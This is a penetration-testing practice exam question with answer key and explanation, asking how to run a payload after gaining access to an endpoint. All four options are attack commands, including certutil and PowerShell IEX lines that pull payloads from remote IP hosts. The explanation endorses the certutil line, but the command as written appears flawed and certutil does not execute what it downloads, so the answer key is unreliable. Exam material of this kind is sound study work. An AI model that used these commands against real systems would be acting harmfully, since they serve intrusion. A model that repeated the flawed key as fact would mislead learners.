A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.
Which of the following commands should the penetration tester use?
A. powershell.exe impo C:\tools\foo.ps1
B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
C. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
D. rundll32.exe c:\path\foo.dll,functName
Answer: B
Explanation:
To execute a payload and gain additional access, the penetration tester should use certutil.exe.
Here’s why:
Using certutil.exe:
Purpose: certutil.exe is a built-in Windows utility that can also download files from a remote server, which makes it useful for fetching a payload onto the endpoint.
Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads foo.exe from the specified URL and saves it locally as bad.exe.
Comparison with the other commands:
powershell.exe impo C:\tools\foo.ps1 (A): the syntax is incorrect, and it is not as direct as certutil for downloading a file.
powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/") (C): incorrect syntax for downloading and executing a script.
rundll32.exe c:\path\foo.dll,functName (D): executes a function exported by a DLL; it does not download a payload.
Using certutil.exe to download and execute a payload is a common and effective method. Because it is also a well-known living-off-the-land technique, defenders commonly alert on certutil.exe making network connections or writing executables to disk.